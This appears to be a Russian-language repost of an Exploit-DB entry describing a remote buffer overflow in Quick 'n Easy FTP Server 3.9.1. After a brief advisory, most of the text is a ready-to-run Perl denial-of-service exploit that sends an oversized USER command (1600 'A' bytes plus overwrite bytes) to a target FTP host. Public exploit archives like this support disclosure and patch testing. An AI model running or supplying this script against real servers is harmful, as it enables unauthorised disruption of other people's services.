- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34403
- Проверка EDB
-
- Пройдено
- Автор
- DEMONALEX
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2010-07-22
Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/42186/info
Quick 'n Easy FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input before copying it to an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Quick 'n Easy FTP Server 3.9.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl -w
#DoS Exploit of Quick Easy Ftp Server version <=3.9.1 USER COMMAND Buffer Overflow
#Vulnerability Discoverer & Autor : demonalex[at]163[dot]com
use Socket;
$host=shift;
$port=shift || '21';
if(!defined($host)){
die("usage: $0 \$host [\$port]\n");
}
#$payload='A'x1604;
$payload=('A'x1600)."\x3D\x41\x41\x41"; #mov dword ptr [ebx+4], ebp
$target_ip=inet_aton($host);
$target=sockaddr_in($port, $target_ip);
socket(SOCK, AF_INET, SOCK_STREAM, 6);
connect(SOCK, $target);
undef($content);
recv(SOCK, $content, 100, 0); #get ftp banner
send(SOCK, "USER "."$payload\r\n", 0);
printf("send ok!\n");
close(SOCK);
exit(0);- Источник
- www.exploit-db.com
